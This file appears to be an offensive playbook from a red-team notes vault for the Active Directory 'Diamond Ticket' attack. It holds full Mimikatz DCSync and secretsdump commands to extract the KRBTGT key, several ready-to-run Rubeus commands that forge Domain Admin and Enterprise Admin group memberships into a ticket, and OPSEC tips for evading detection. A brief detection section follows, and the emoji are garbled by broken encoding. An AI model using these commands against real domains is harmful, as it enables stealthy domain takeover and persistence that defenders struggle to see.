attack-13-diamond-ticket-attack.md (8106B)
1 --- 2 title: "Attack #13 โ Diamond Ticket Attack" 3 description: "The Diamond Ticket is an evolution of the Golden Ticket that was developed to bypass modern detection mechanisms. While a Golden Ticket forges a TGTโฆ" 4 category: active-directory 5 subcategory: "Kerberos & Delegation" 6 tags: ["active-directory", "adcs", "credential-access", "kerberos", "privilege-escalation"] 7 tools: ["Impacket", "Mimikatz", "Rubeus", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/๐ Attack #13 โ Diamond Ticket Attack.md" 11 --- 12 # ๐ Attack #13 โ Diamond Ticket Attack 13 14 *** 15 16 ## ๐ How It Works 17 18 The Diamond Ticket is an **evolution of the Golden Ticket** that was developed to bypass modern detection mechanisms. While a Golden Ticket forges a TGT entirely from scratch (meaning there is no corresponding AS-REQ in the DC logs, which is a primary detection indicator), a Diamond Ticket takes a **legitimate TGT obtained through a real AS-REQ/AS-REP exchange**, decrypts it using the KRBTGT AES key, **modifies the PAC** (Privilege Attribute Certificate) to inject elevated group memberships, then re-encrypts and re-signs it. Because the ticket originated from a real authentication event, it has a valid audit trail on the DC โ making it significantly harder to detect. 19 20 ### Diamond Ticket vs Golden Ticket 21 22 | Aspect | Golden Ticket | Diamond Ticket | 23 |---|---|---| 24 | **TGT source** | Forged entirely offline | Real TGT from legitimate AS-REQ | 25 | **AS-REQ event** | โ Missing (primary IOC) | โ Present โ blends with normal traffic | 26 | **PAC** | Entirely fabricated | Modified from legitimate PAC | 27 | **KRBTGT key needed** | Yes (NT hash or AES) | Yes (AES256 required for decryption) | 28 | **Detection difficulty** | Moderate โ missing AS-REQ | Hard โ requires PAC anomaly detection | 29 | **OPSEC level** | Medium | High | 30 | **Tool support** | Mimikatz, Rubeus, ticketer.py | Rubeus (`diamond` command) | 31 32 ### The Full Attack Flow 33 34 ``` 35 1. Obtain KRBTGT AES256 key (via DCSync) 36 2. Request a legitimate TGT for your controlled user (real AS-REQ) 37 3. Rubeus decrypts the TGT using the KRBTGT AES key 38 4. Modify the PAC โ inject DA/EA group memberships (RID 512, 519, etc.) 39 5. Re-encrypt and re-sign the TGT with the KRBTGT key 40 6. Inject the modified ticket into your session 41 7. Access any resource as DA โ with a clean audit trail on the DC 42 ``` 43 44 *** 45 46 ## โ๏ธ Prerequisites 47 48 | Requirement | Detail | 49 |---|---| 50 | **KRBTGT AES256 key** | Required for decryption/re-encryption โ NT hash alone is insufficient | 51 | **Domain Admin or DCSync rights** | To extract the KRBTGT key | 52 | **Valid domain user account** | Needed to request the initial legitimate TGT | 53 | **Domain SID** | For PAC modification | 54 55 *** 56 57 ## ๐ ๏ธ Tools 58 59 | Tool | Platform | Notes | 60 |---|---|---| 61 | **Rubeus** | Windows | `diamond` subcommand โ primary tool for Diamond Tickets | 62 | **Mimikatz** | Windows | DCSync to extract KRBTGT AES key (prerequisite step) | 63 | **Impacket โ secretsdump.py** | Linux | Extract KRBTGT AES key from Linux | 64 | **Impacket โ ticketer.py** | Linux | Can be used with modifications for PAC manipulation | 65 66 *** 67 68 ## ๐ป Full Commands 69 70 ### ๐ต Step 0 โ Extract KRBTGT AES256 Key 71 72 ```powershell 73 # โโ Mimikatz DCSync for KRBTGT AES key โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 74 privilege::debug 75 lsadump::dcsync /domain:corp.local /user:krbtgt 76 77 # Look for: aes256_hmac: b65fb27c8e0d7c5f48b16c10b4... 78 ``` 79 80 ```bash 81 # โโ Linux โ secretsdump โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 82 secretsdump.py corp.local/Administrator:'Password1'@DC01.corp.local -just-dc-user krbtgt 83 # Extract the aes256-cts-hmac-sha1-96 key from the kerberos section 84 ``` 85 86 ### ๐ด Rubeus โ Forge Diamond Ticket 87 88 ```powershell 89 # โโ Standard Diamond Ticket โ impersonate DA โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 90 .\Rubeus.exe diamond \ 91 /krbkey:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 92 /user:low_user \ 93 /password:Password1 \ 94 /enctype:aes \ 95 /domain:corp.local \ 96 /dc:DC01.corp.local \ 97 /ticketuser:Administrator \ 98 /ticketuserid:500 \ 99 /groups:512 \ 100 /ptt 101 102 # Flags explained: 103 # /krbkey = KRBTGT AES256 key 104 # /user = YOUR low-priv user to request initial legitimate TGT 105 # /password = YOUR password for the initial TGT request 106 # /enctype = Force AES encryption (stealthy) 107 # /ticketuser = The user identity to embed in the modified PAC 108 # /ticketuserid = RID of the target user (500 = Administrator) 109 # /groups = Group RIDs to inject (512=DA, 519=EA, 518=Schema Admins) 110 # /ptt = Inject into current session 111 112 # โโ Diamond Ticket with multiple privileged groups โโโโโโโโโโโโโโโโโโโโโโโโโโโโ 113 .\Rubeus.exe diamond \ 114 /krbkey:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 115 /user:low_user \ 116 /password:Password1 \ 117 /enctype:aes \ 118 /domain:corp.local \ 119 /dc:DC01.corp.local \ 120 /ticketuser:Administrator \ 121 /ticketuserid:500 \ 122 /groups:512,519,518,520 \ 123 /ptt 124 125 # โโ Diamond Ticket with LDAP + OPSEC flags โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 126 .\Rubeus.exe diamond \ 127 /krbkey:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 128 /user:low_user \ 129 /password:Password1 \ 130 /enctype:aes \ 131 /domain:corp.local \ 132 /dc:DC01.corp.local \ 133 /ticketuser:Administrator \ 134 /ticketuserid:500 \ 135 /groups:512 \ 136 /ldap /nowrap /ptt 137 138 # /ldap = Query LDAP for accurate user/group info for the PAC (most OPSEC) 139 140 # โโ Verify โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 141 klist 142 dir \\DC01.corp.local\C$ 143 ``` 144 145 *** 146 147 ## ๐ฏ OPSEC Tips 148 149 - **Diamond Ticket is the stealthiest TGT-based attack** โ unlike Golden Ticket, a real AS-REQ exists in DC logs, so the "TGS without TGT" detection fails 150 - **Always use AES256** โ RC4 encryption generates detectable anomalies; AES256 is standard 151 - **Use the `/ldap` flag** in Rubeus to pull real user attributes for the PAC โ this prevents inconsistencies that could be flagged by PAC inspection 152 - **The KRBTGT AES key is mandatory** โ unlike Golden Tickets which can use the NT hash (RC4), Diamond Tickets require the AES key for proper decryption/re-encryption 153 154 *** 155 156 ## ๐ก๏ธ Detection โ Event IDs 157 158 | Event ID | Source | What to Look For | 159 |---|---|---| 160 | **4768** | Security Log (DC) | TGT request โ present (unlike Golden Ticket), but subsequent access may show elevated privileges | 161 | **4769** | Security Log (DC) | TGS requests with privileges that don't match the user's actual group memberships | 162 | **4624** | Security Log | Logon with DA-level privileges from a user that should be low-privilege | 163 164 **Primary detection:** Diamond Tickets require **PAC-level inspection** โ comparing the group memberships claimed in the TGT's PAC against the user's actual AD group memberships. If a user's TGT claims membership in Domain Admins but their AD object shows no such membership, it's a forged or modified ticket. Microsoft Defender for Identity can perform this correlation. 165 166 *** 167 168 ## ๐ Attack Chain Context 169 170 ``` 171 [Diamond Ticket] โโโ Stealthy Domain Admin Persistence 172 โ 173 โโโโ ๐ซ Stealthier Golden Ticket โ has real AS-REQ in DC logs 174 โโโโ ๐ฉธ Use as DA โ DCSync โ extract all hashes 175 โโโโ ๐ Survives password changes (until KRBTGT reset ร 2) 176 โโโโ ๐ Chain: DCSync (get KRBTGT key) โ Diamond Ticket โ persist 177 โโโโ ๐ Defeated by: KRBTGT password reset ร 2, PAC inspection, MDI 178 ``` 179 180 *** 181 182 > โ **Attack #13 โ Diamond Ticket complete.**